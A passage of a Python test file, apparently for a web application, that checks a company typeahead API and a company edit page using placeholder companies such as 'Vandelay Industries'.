industry_name}\n return self.mds_access.call_add_entity(\"industry\", industry_name, data, self.context)\n\n def __delete_entity(self, entity_type, entity_id):\n return self.mds_access.call_del_entity(entity_type, entity_id)\n\n ##------------------------------------ Typeahead Tests ---------------------------------------##\n\n def test_company_typeahead_empty(self):\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, [])\n\n\n def test_company_typeahead_one_company(self):\n\n company_id = self.__add_company(\"Vandelay Industries\")\n\n expected_company_rec = {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id,\n u'name': u'Vandelay Industries'\n }\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, [expected_company_rec])\n\n try:\n self.__delete_entity(\"company\", company_id)\n except:\n pass\n\n\n def test_company_typeahead_multiple_companies(self):\n\n company_id1 = self.__add_company(\"Vandelay Industries 1\")\n company_id2 = self.__add_company(\"Vandelay Industries 2\")\n\n expected_company_list = [\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id1,\n u'name': u'Vandelay Industries 1',\n\n },\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id2,\n u'name': u'Vandelay Industries 2',\n }\n ]\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, expected_company_list)\n\n try:\n self.__delete_entity(\"company\", company_id1)\n self.__delete_entity(\"company\", company_id2)\n 
except:\n pass\n\n def test_company_typeahead_multiple_companies_with_delete(self):\n\n company_id1 = self.__add_company(\"Vandelay Industries 1\")\n company_id2 = self.__add_company(\"Vandelay Industries 2\")\n\n expected_company_list = [\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id1,\n u'name': u'Vandelay Industries 1'\n },\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id2,\n u'name': u'Vandelay Industries 2'\n }\n ]\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, expected_company_list)\n\n # delete 2nd company\n self.__delete_entity(\"company\", company_id2)\n expected_company_list.pop(1)\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, expected_company_list)\n\n try:\n self.__delete_entity(\"company\", company_id1)\n except:\n pass\n\n ##------------------------------------ HTML Tests ---------------------------------------------##\n\n def test_view_edit_company_page(self):\n\n company_id = self.__add_company(\"Vandelay Industries\")\n\n # need to have at least 1 industry for the page to work\n industry_id = self.__add_industry(\"Architecture\")\n\n response = self.web_access.get(\"/company/%s\" % company_id, cookies=self.cooks)\n\n self.test_case.assert200(response)\n self.test_case.assertEqual(response.headers[\"content-type\"], \"text/html; charset=utf-8\")\n self.test_case.assertGreater(len(response.content), 1000)\n\n # make sure company name text input is in there\n self.test_case.assertRegexpMatches(response.content, r\"input id=\\\"txt_company_name\\\"[^>]*value=\\\"Vandelay Industries\\\"\")\n\n # make sure company name text input is in there\n self.test_case.assertIn('